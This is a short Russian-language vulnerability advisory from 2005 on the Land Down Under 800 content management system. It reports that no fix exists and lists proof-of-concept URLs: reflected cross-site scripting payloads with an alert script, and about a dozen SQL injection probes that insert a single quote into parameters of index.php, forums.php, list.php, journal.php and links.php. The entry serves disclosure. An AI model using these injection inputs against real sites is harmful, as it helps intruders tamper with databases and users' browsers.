Множественные уязвимости в Land Down Under 800

Дата публикации:
24.08.2005
Дата изменения:
20.10.2006
Всего просмотров:
1703
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: Land Down Under 800

Описание: Удаленный пользователь может выполнить XSS нападение и выполнить произвольные SQL команды на операционной системе.

1. XSS:

/ldu/index.php?c='><script>alert('test');</script>
/ldu/index.php?m='><script>alert('test');</scrip t>
/ldu/journal.php?m=home&s=username&w='><script>alert('test');</script>
2. SQL инъекция:

/ldu/forums.php?m=topics&s=' 
/ldu/list.php?c=articles&s=title&w=asc&o='&p=1
/ldu/list.php?c=articles&s=title&w='&o=1&p=1 
/ldu/list.php?c=articles&s='&w=asc&o=1&p=1
/ldu/journal.php?m='&s=username&w=asc 
/ldu/journal.php?m='&p=1
/ldu/journal.php?m=' 
/ldu/forums.php?filter=forums%2Ephp%3Fc%3Dskin&x=' 
/ldu/forums.php?m=topics&q=3&n=' 
/ldu/list.php?c=articles&s=title&w=asc&o=1&p=' 
/ldu/forums.php?m='&q=3&n=last 
/ldu/links.php?c=links&s=title&w='

URL производителя:http://www.neocrome.net/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.



Ссылки: Bugs Land Down Under v800
или введите имя

CAPTCHA